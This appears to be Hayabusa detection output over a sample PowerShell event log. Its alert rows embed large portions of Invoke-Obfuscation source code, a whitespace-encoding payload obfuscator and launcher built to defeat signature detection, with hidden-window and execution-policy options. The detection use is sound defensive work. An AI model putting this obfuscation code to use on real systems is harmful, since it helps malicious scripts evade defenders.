Switch($ArgumentValue.ToLower()) { 'normal' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('0','n','no','nor','norm','norma'))}} 'hidden' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('1','h','hi','hid','hidd','hidde'))}} 'minimized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('2','mi','min','mini','minim','minimi','minimiz','minimize'))}} 'maximized' {If(Get-Random -Input @(0..1)) {$ArgumentValue = (Get-Random -Input @('3','ma','max','maxi','maxim','maximi','maximiz','maximize'))}} default {Write-Error ""An invalid `$ArgumentValue value ($ArgumentValue) was passed to switch block for Out-PowerShellLauncher.""; Exit;} } $PowerShellFlags += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } If($PSBoundParameters['ExecutionPolicy'] -OR $ExecutionPolicy) { $FullArgument = ""-ExecutionPolicy"" If($ExecutionPolicy) {$ArgumentValue = $ExecutionPolicy} Else {$ArgumentValue = $PSBoundParameters['ExecutionPolicy']} # Take into account the shorted flag of -EP as well. $ExecutionPolicyFlags = @() $ExecutionPolicyFlags += '-EP' For($Index=3; $Index -le $FullArgument.Length; $Index++) { $ExecutionPolicyFlags += $FullArgument.SubString(0,$Index) } $ExecutionPolicyFlag = Get-Random -Input $ExecutionPolicyFlags $PowerShellFlags += $ExecutionPolicyFlag + ' '*(Get-Random -Minimum 1 -Maximum 3) + $ArgumentValue } # Randomize the order of the execution flags. # This is to prevent the Blue Team from placing false hope in simple signatures for ordering of these flags. If($CommandlineOptions.Count -gt 1) { $CommandlineOptions = Get-Random -InputObject $CommandlineOptions -Count $CommandlineOptions.Count } # If selected then the -Command flag needs to be added last. 
If($PSBoundParameters['Command']) { $FullArgument = ""-Command"" $CommandlineOptions += $FullArgument.SubString(0,(Get-Random -Minimum 2 -Maximum ($FullArgument.Length+1))) } # Randomize the case of all command-line arguments. For($i=0; $i -lt $PowerShellFlags.Count; $i++) { $PowerShellFlags[$i] = ([Char[]]$PowerShellFlags[$i] | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' } # Random-sized whitespace between all execution flags and encapsulating final string of execution flags. $CommandlineOptions = ($CommandlineOptions | ForEach-Object {$_ + "" ""*(Get-Random -Minimum 1 -Maximum 3)}) -Join '' $CommandlineOptions = "" ""*(Get-Random -Minimum 0 -Maximum 3) + $CommandlineOptions + "" ""*(Get-Random -Minimum 0 -Maximum 3) # Build up the full command-line string. If($PSBoundParameters['Wow64']) { $CommandLineOutput = ""$($Env:windir)\SysWOW64\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" } Else { # Obfuscation isn't about saving space, and there are reasons you'd potentially want to fully path powershell.exe (more info on this soon). #$CommandLineOutput = ""$($Env:windir)\System32\WindowsPowerShell\v1.0\powershell.exe $($CommandlineOptions) `""$NewScript`"""" $CommandLineOutput = ""powershell $($CommandlineOptions) `""$NewScript`"""" } # Make sure final command doesn't exceed cmd.exe's character limit. $CmdMaxLength = 8190 If($CommandLineOutput.Length -gt $CmdMaxLength) { Write-Warning ""This command exceeds the cmd.exe maximum allowed length of $CmdMaxLength characters! 
Its length is $($CmdLineOutput.Length) characters."" } $NewScript = $CommandLineOutput } Return $NewScript }",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.280 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"# This file is part of Invoke-Obfuscation. # # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. 
.PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. .PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' 
-ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. .LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. 
ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. $IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) 
-Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random -Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. 
$ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. $RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",rules/hayabusa/default/alerts/PowerShellOperational/4104_PowershellScriptblockLogging_PotentiallyMalicious.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,info,,PwSh Scriptblock Log,"# This file is part of Invoke-Obfuscation. 
# # Copyright 2017 Daniel Bohannon <@danielhbohannon> # while at Mandiant # # Licensed under the Apache License, Version 2.0 (the ""License""); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an ""AS IS"" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. Function Out-EncodedWhitespaceCommand { <# .SYNOPSIS Generates Whitespace encoded payload for a PowerShell command or script. Optionally it adds command line output to final command. Invoke-Obfuscation Function: Out-EncodedWhitespaceCommand Author: Daniel Bohannon (@danielhbohannon) License: Apache License, Version 2.0 Required Dependencies: None Optional Dependencies: None .DESCRIPTION Out-EncodedWhitespaceCommand encodes an input PowerShell scriptblock or path as a Whitespace-and-Tab encoded payload. The purpose is to highlight to the Blue Team that there are more novel ways to encode a PowerShell command other than the most common Base64 approach. .PARAMETER ScriptBlock Specifies a scriptblock containing your payload. .PARAMETER Path Specifies the path to your payload. .PARAMETER NoExit Outputs the option to not exit after running startup commands. .PARAMETER NoProfile Outputs the option to not load the Windows PowerShell profile. .PARAMETER NonInteractive Outputs the option to not present an interactive prompt to the user. .PARAMETER NoLogo Outputs the option to not present the logo to the user. .PARAMETER Wow64 Calls the x86 (Wow64) version of PowerShell on x86_64 Windows installations. .PARAMETER Command Outputs the option to execute the specified commands (and any parameters) as though they were typed at the Windows PowerShell command prompt. 
.PARAMETER WindowStyle Outputs the option to set the window style to Normal, Minimized, Maximized or Hidden. .PARAMETER ExecutionPolicy Outputs the option to set the default execution policy for the current session. .PARAMETER PassThru (Optional) Avoids applying final command line syntax if you want to apply more obfuscation functions (or a different launcher function) to the final output. .EXAMPLE C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive powershell -NoP -NonInterac ""' '|%{$uXOrcSp= $_ -CSplIt ' ' | %{' ' ; $_ -CSplIt ' ' |% { $_.lEngth- 1}} ; .( ([string]''.LAstINDEXOFANy)[92,95,96]-join'')( (($uXOrcSp[0..($uXOrcSp.lEngth-1)] -join'' ).TrIm( ' ').SPLIT(' ' ) |% {([chAr][iNt]$_) })-join '' ) }"" C:\PS> Out-EncodedWhitespaceCommand -ScriptBlock {Write-Host 'Hello World!' -ForegroundColor Green; Write-Host 'Obfuscation Rocks!' -ForegroundColor Green} -NoProfile -NonInteractive -PassThru ' '| % {$gyPrfqv= $_ -csPLiT ' '|% { ' ';$_.SPlIT(' ') | %{$_.LEngth - 1 }}; [StRINg]::joIn( '',((-jOin ($gyPrfqv[0..($gyPrfqv.LEngth-1)])).triM( ' ' ).SPlIT(' ' )|% { ( [CHAr][iNt]$_)}))|&( $eNv:CoMSPEC[4,26,25]-jOiN'')} .NOTES Inspiration for this encoding technique came from Casey Smith (@subTee) while at the 2017 BlueHat IL conference. This is a personal project developed by Daniel Bohannon while an employee at MANDIANT, A FireEye Company. 
.LINK http://www.danielbohannon.com #> [CmdletBinding(DefaultParameterSetName = 'FilePath')] Param ( [Parameter(Position = 0, ValueFromPipeline = $True, ParameterSetName = 'ScriptBlock')] [ValidateNotNullOrEmpty()] [ScriptBlock] $ScriptBlock, [Parameter(Position = 0, ParameterSetName = 'FilePath')] [ValidateNotNullOrEmpty()] [String] $Path, [Switch] $NoExit, [Switch] $NoProfile, [Switch] $NonInteractive, [Switch] $NoLogo, [Switch] $Wow64, [Switch] $Command, [ValidateSet('Normal', 'Minimized', 'Maximized', 'Hidden')] [String] $WindowStyle, [ValidateSet('Bypass', 'Unrestricted', 'RemoteSigned', 'AllSigned', 'Restricted')] [String] $ExecutionPolicy, [Switch] $PassThru ) # Either convert ScriptBlock to a String or convert script at $Path to a String. If($PSBoundParameters['Path']) { Get-ChildItem $Path -ErrorAction Stop | Out-Null $ScriptString = [IO.File]::ReadAllText((Resolve-Path $Path)) } Else { $ScriptString = [String]$ScriptBlock } # Convert $ScriptString to an ASCII-encoded array. $AsciiArray = [Int[]][Char[]]$ScriptString # Encode ASCII array with defined EncodingChar and DelimiterChar (randomly-selected as whitespace and tab, [Char]9). $RandomIndex = Get-Random -Input @(0,1) $EncodedArray = @() $EncodingChar = @(' ',[Char]9)[$RandomIndex] $DigitDelimiterChar = @([Char]9,' ')[$RandomIndex] # Enumerate each ASCII value and (ultimately) store decoded ASCII values in $EncodedArray array. ForEach($AsciiValue in $AsciiArray) { $EncodedAsciiValueArray = @() # Enumerate each digit in current ASCII value and convert it to DelimiterChar*Digit. ForEach($Digit in [Char[]][String]$AsciiValue) { $EncodedAsciiValueArray += [String]$EncodingChar*([Int][String]$Digit + 1) } $EncodedArray += ($EncodedAsciiValueArray -Join $DigitDelimiterChar) } # Set $IntDelimiterChar to be two instances of $DigitDelimiterChar. # $IntDelimiterChar will essentially be like the comma in the original ASCII array. 
$IntDelimiterChar = $DigitDelimiterChar + $DigitDelimiterChar # Join together final $EncodedString with delimiter selected above. $EncodedString = ($EncodedArray -Join $IntDelimiterChar) # Generate random case versions for necessary operations. $ForEachObject = Get-Random -Input @('ForEach','ForEach-Object','%') $SplitMethod = Get-Random -Input @('-Split','-CSplit','-ISplit') $Trim = Get-Random -Input @('Trim','TrimStart') $StrJoin = ([Char[]]'[String]::Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $StrStr = ([Char[]]'[String]' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Join = ([Char[]]'-Join' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $CharStr = ([Char[]]'Char' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Int = ([Char[]]'Int' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Length = ([Char[]]'Length' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $ForEachObject = ([Char[]]$ForEachObject | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod = ([Char[]]$SplitMethod | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitMethod2 = ([Char[]]'Split' | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $Trim = ([Char[]]$Trim | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SplitOnDelim = Get-Random 
-Input @("" $SplitMethod '$DigitDelimiterChar'"","".$SplitMethod2('$DigitDelimiterChar')"") # Generate random variable name to store the script's intermediate state while being reassembled. $RandomScriptVar = (Get-Random -Input @('a','b','c','d','e','f','g','h','i','j','k','l','m','n','o','p','q','r','s','t','u','v','w','x','y','z') -Count (Get-Random -Input @(5..8)) | ForEach-Object {$UpperLowerChar = $_; If(Get-Random -Input @(0..1)) {$UpperLowerChar = $UpperLowerChar.ToUpper()} $UpperLowerChar}) -Join '' # Build the first part of the decoding routine. $ScriptStringPart1 = ""'$EncodedString'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$$RandomScriptVar"" + ' '*(Get-Random -Input @(0,1)) + '=' + ' '*(Get-Random -Input @(0,1)) + ""`$_ $SplitMethod '$IntDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ';' + ' '*(Get-Random -Input @(0,1)) + ""`$_$SplitOnDelim"" + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + ""`$_.$Length"" + ' '*(Get-Random -Input @(0,1)) + '-' + ' '*(Get-Random -Input @(0,1)) + '1' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ';' # Randomly select between various conversion syntax options. 
$RandomStringSyntax = ([Char[]](Get-Random -Input @('[String]$_','$_.ToString()')) | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $RandomConversionSyntax = @() $RandomConversionSyntax += ""[$CharStr]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" $RandomConversionSyntax += ""[$Int]"" + ' '*(Get-Random -Input @(0,1)) + ""`$_"" + ' '*",rules/hayabusa/non-default/events/PowerShellOperational/4104_PowershellScriptblockLogging.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,Evas,Suspicious PowerShell WindowStyle Option,,rules/sigma/powershell/powershell_script/posh_ps_suspicious_windowstyle.yml,../hayabusa-sample-evtx/DeepBlueCLI/Powershell-Invoke-Obfuscation-many.evtx +2017-08-30 18:15:55.285 +00:00,SEC511,4104,medium,,Potentially Malicious PwSh,"(Get-Random -Input @(0,1)) + (Get-Random -Input @('-as','-As','-aS','-AS')) + ' '*(Get-Random -Input @(0,1)) + ""[$CharStr]"" $RandomConversionSyntax = (Get-Random -Input $RandomConversionSyntax) # Create array syntax for encoded $ScriptString as alternative to .Split/-Split syntax. $EncodedArray = '' ([Char[]]$ScriptString) | ForEach-Object {$EncodedArray += ([Convert]::ToString(([Int][Char]$_),$EncodingBase) + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)))} # Remove trailing comma from $EncodedArray. $EncodedArray = ('(' + ' '*(Get-Random -Input @(0,1)) + $EncodedArray.Trim().Trim(',') + ')') # Generate random syntax to create/set OFS variable ($OFS is the Output Field Separator automatic variable). # Using Set-Item and Set-Variable/SV/SET syntax. Not using New-Item in case OFS variable already exists. 
# If the OFS variable did exists then we could use even more syntax: $varname, Set-Variable/SV, Set-Item/SET, Get-Variable/GV/Variable, Get-ChildItem/GCI/ChildItem/Dir/Ls # For more info: https://msdn.microsoft.com/en-us/powershell/reference/5.1/microsoft.powershell.core/about/about_automatic_variables $SetOfsVarSyntax = @() $SetOfsVarSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVarSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""''"" $SetOfsVar = (Get-Random -Input $SetOfsVarSyntax) $SetOfsVarBackSyntax = @() $SetOfsVarBackSyntax += 'Set-Item' + ' '*(Get-Random -Input @(1,2)) + ""'Variable:OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBackSyntax += (Get-Random -Input @('Set-Variable','SV','SET')) + ' '*(Get-Random -Input @(1,2)) + ""'OFS'"" + ' '*(Get-Random -Input @(1,2)) + ""' '"" $SetOfsVarBack = (Get-Random -Input $SetOfsVarBackSyntax) # Randomize case of $SetOfsVar and $SetOfsVarBack. $SetOfsVar = ([Char[]]$SetOfsVar | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' $SetOfsVarBack = ([Char[]]$SetOfsVarBack | ForEach-Object {$Char = $_.ToString().ToLower(); If(Get-Random -Input @(0..1)) {$Char = $Char.ToUpper()} $Char}) -Join '' # Generate the code that will iterate through each element of the array. $BaseScriptArray1 = ""`$$RandomScriptVar[0..(`$$RandomScriptVar.$Length-1)]"" # Generate random JOIN syntax for all above options. 
$NewScriptArray1 = @() $NewScriptArray1 += $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray1 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += $StrJoin + '(' + ' '*(Get-Random -Input @(0,1)) + ""''"" + ' '*(Get-Random -Input @(0,1)) + ',' + ' '*(Get-Random -Input @(0,1)) + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + ')' $NewScriptArray1 += '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVar + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' + ' '*(Get-Random -Input @(0,1)) + '+' + ' '*(Get-Random -Input @(0,1)) + $StrStr + $BaseScriptArray1 + ' '*(Get-Random -Input @(0,1)) + '+' + '""' + ' '*(Get-Random -Input @(0,1)) + '$(' + ' '*(Get-Random -Input @(0,1)) + $SetOfsVarBack + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '""' # Randomly select one of the above commands. $NewScript1 = (Get-Random -Input $NewScriptArray1) # Generate the code that will decrypt and execute the payload and randomly select one. 
$BaseScriptArray2 = @() $BaseScriptArray2 += '(' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'"" + $DigitDelimiterChar + ""'"" + ' '*(Get-Random -Input @(0,1)) + ')' + ' '*(Get-Random -Input @(0,1)) + '|' + ' '*(Get-Random -Input @(0,1)) + $ForEachObject + ' '*(Get-Random -Input @(0,1)) + '{' + ' '*(Get-Random -Input @(0,1)) + '(' + ' '*(Get-Random -Input @(0,1)) + $RandomConversionSyntax + ')' + ' '*(Get-Random -Input @(0,1)) + '}' + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 += ""`[$CharStr[]]"" + ' '*(Get-Random -Input @(0,1)) + ""[$Int[]]"" + ' '*(Get-Random -Input @(0,1)) + ""("" + ' '*(Get-Random -Input @(0,1)) + $NewScript1 + ' '*(Get-Random -Input @(0,1)) + "").$Trim("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar '"" + ' '*(Get-Random -Input @(0,1)) + "").$SplitMethod2("" + ' '*(Get-Random -Input @(0,1)) + ""'$DigitDelimiterChar'"" + ' '*(Get-Random -Input @(0,1)) + ')' $BaseScriptArray2 = (Get-Random -Input $BaseScriptArray2) # Generate random JOIN syntax for all above options. $NewScriptArray2 = @() $NewScriptArray2 += $BaseScriptArray2 + ' '*(Get-Random -Input @(0,1)) + $Join + ' '*(Get-Random -Input @(0,1)) + ""''"" $NewScriptArray2 += $Join + ' '*(Get-Random -Input @(0,1)) + '(' + $BaseScriptArray2 + ')' $NewScriptArray2 += $StrJoin + '(' + ' '*(Get-Random -Input 